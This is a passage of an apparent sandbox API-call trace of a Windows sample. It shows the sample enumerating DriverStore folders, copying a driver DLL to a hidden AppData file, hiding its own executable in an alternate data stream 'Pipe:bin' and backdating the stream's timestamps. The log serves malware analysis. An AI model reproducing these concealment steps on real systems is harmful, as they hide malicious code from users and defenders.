lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmiodat.inf_amd64_neutral_839e9ee1a8736613\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bbdf54c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6889fafd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6889fafd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.571] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.571] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmirmdm.inf_amd64_neutral_fadec14b0a37b637\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39b8ca79, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f6ad510, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f6ad510, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.572] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.572] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmisdn.inf_amd64_neutral_061c61abd3904560\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bc9dc2e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x688c5c5d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x688c5c5d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.572] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.572] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmjf56e.inf_amd64_neutral_328dabbf0aeed9bc\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bd8246f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68911f1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68911f1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.573] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.573] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmke.inf_amd64_neutral_3e4daa83122b1559\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4be1a9f0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68911f1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68911f1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.573] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.573] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmkortx.inf_amd64_neutral_1975687236603184\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bed90d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6893807e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6893807e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.574] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.574] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlasat.inf_amd64_neutral_bc1469ba40fe2114\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bf71653, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6898433e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6898433e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.574] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.576] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlasno.inf_amd64_neutral_c86d5b5e5fa8b48a\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c055e94, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x689aa49f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x689aa49f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.577] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.577] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.577] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlucnt.inf_amd64_neutral_642a5ab3f2a1ae20\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c114576, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68be5943, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68be5943, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.577] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.577] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.577] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmc288.inf_amd64_neutral_c4a901dab689ad79\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c1d2c57, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68dfac87, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68dfac87, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.578] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.578] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmcd.inf_amd64_neutral_49212f5920298e45\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c291338, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e20de7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e20de7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.578] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.578] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmcom.inf_amd64_neutral_716a306ec3899e04\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c34fa1a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e20de7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e20de7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.578] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.579] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmct.inf_amd64_neutral_15bb3ed734fbbeb3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c43425c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e6d0a7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e6d0a7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.579] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.579] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmega.inf_amd64_neutral_f9c441ed24f00358\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c4f293d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e93208, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e93208, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.580] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.580] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmetri.inf_amd64_neutral_f89b8a357327f615\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c5d717f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68eb9368, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68eb9368, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.580] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.581] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmhrtz.inf_amd64_neutral_10affee00545fb45\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c6e1b20, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68f2b789, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68f2b789, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.581] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.581] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmhzel.inf_amd64_neutral_1292ec506cfc26db\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c85e8e3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68f9dbaa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68f9dbaa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.581] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.582] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmminij.inf_amd64_neutral_7c300346e830b2dc\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c969285, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6903612b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6903612b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.582] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.582] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmod.inf_amd64_neutral_5766736c47b90fff\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ca01806, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x690823eb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x690823eb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.582] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.583] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.583] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmot64.inf_amd64_neutral_1abbad2f29c8fa08\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x507bf318, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c1285e5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c1285e5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.583] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.583] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.586] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmoto1.inf_amd64_neutral_bf4b404852955eb4\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cabfee8, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x690ce6ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x690ce6ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.587] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.587] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.587] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmotou.inf_amd64_neutral_eb1d978f38f35bca\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cb58469, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x69309b50, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x69309b50, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.588] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.588] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmts.inf_amd64_neutral_b7f0a8d5f67c19e8\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cc3ccaa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6932fcb0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6932fcb0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.588] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.588] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0030.328] lstrcpyW (in: lpString1=0x461294, lpString2="Pipe" | out: lpString1="Pipe") returned="Pipe" [0030.328] CopyFileW (lpExistingFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\prnep00a.inf_amd64_neutral_92a4c727cdf4c2f7\\Amd64\\EP0NAR00.DLL" (normalized: "c:\\windows\\system32\\driverstore\\filerepository\\prnep00a.inf_amd64_neutral_92a4c727cdf4c2f7\\amd64\\ep0nar00.dll"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe"), bFailIfExists=1) returned 1 [0030.337] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe", dwFileAttributes=0x2) returned 1 [0030.338] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43a928 | out: hHeap=0x420000) returned 1 [0030.338] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe", lpString2=":bin" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin" [0030.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\haaadn.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\haaadn.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0030.338] GetFileSize (in: hFile=0x9c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe000 [0030.338] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xe002) returned 0x43b028 [0030.338] ReadFile (in: hFile=0x9c, lpBuffer=0x43b028, nNumberOfBytesToRead=0xe000, lpNumberOfBytesRead=0x18feb4, lpOverlapped=0x0 | out: lpBuffer=0x43b028*, lpNumberOfBytesRead=0x18feb4*=0xe000, lpOverlapped=0x0) returned 1 [0030.339] CloseHandle (hObject=0x9c) returned 1 [0030.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0030.340] WriteFile (in: hFile=0x9c, lpBuffer=0x43b028*, nNumberOfBytesToWrite=0xe000, lpNumberOfBytesWritten=0x18fec0, lpOverlapped=0x0 | out: lpBuffer=0x43b028*, lpNumberOfBytesWritten=0x18fec0*=0xe000, lpOverlapped=0x0) returned 1 [0030.342] SetEndOfFile (hFile=0x9c) returned 1 [0030.342] CloseHandle (hObject=0x9c) returned 1 [0030.343] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43b028 | out: hHeap=0x420000) returned 1 [0030.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0030.343] SetFileTime (hFile=0x9c, lpCreationTime=0x48ea78, lpLastAccessTime=0x48ea78, lpLastWriteTime=0x48ea78) returned 1 [0030.344] CloseHandle (hObject=0x9c) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c2d0 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c378 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c430 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c4d0 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c570 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c610 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c6b0 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c760 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c810 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c8b8 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44c960 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44ca20 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44cac8 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44cb68 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44cc10 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44ccb0 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44cd50 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44cdf8 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44ce98 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e1e0 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e2b0 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e378 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e448 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e4f0 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e590 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e630 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e6d0 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e770 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e818 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x44e8b8 | out: hHeap=0x420000) returned 1 [0030.344] HeapFree (in: hHeap=0x420000, 